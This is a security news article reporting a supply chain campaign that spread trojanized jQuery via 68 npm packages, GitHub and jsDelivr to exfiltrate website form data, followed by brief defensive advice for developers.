Unknown threat actors have been spreading compromised versions of jQuery on npm, GitHub, and jsDelivr, indicating a complex and persistent supply chain attack.
Researcher analysis highlights the attack’s distinctiveness due to the variability among the packages. The attackers have hidden the malware within the rarely-used ‘end’ function of jQuery, which is internally called by the popular ‘fadeTo’ animation function.
The campaign has involved 68 packages, published to the npm registry between May 26 and June 23, 2024. The packages have been given names such as cdnjquery, footersicons, jquertyi, jqueryxxx, logoo, and sytlesheets.
Evidence suggests that each of these malicious packages was manually assembled and published. This conclusion is based on the variety of names, inclusion of personal files, and the extended period over which the packages were uploaded. This manual approach contrasts with the automated methods typically seen in such attacks.
Researcher found that the malware exfiltrates website form data via the ‘end’ function to a remote URL. Further investigation revealed the trojanized jQuery file hosted on a GitHub repository linked to an account named “indexsc.” The same repository also contains JavaScript files pointing to the modified library.
Researcher notes that jsDelivr automatically constructs these GitHub URLs without explicit uploads to the CDN, possibly an attempt by the attackers to legitimize the source or bypass firewalls by using jsDelivr instead of directly loading from GitHub.
This incident follows Datadog’s discovery of malicious packages on the Python Package Index (PyPI) repository, capable of downloading a second-stage binary from an attacker-controlled server based on CPU architecture.
To prevent the risks associated with trojanized jQuery packages, developers and organizations should prioritize supply chain security. This includes verifying the integrity of packages before integrating them into projects, using tools to detect tampered packages, and keeping an updated list of trusted sources. Implementing continuous monitoring and automated security scans for code dependencies can help identify and mitigate potential threats.
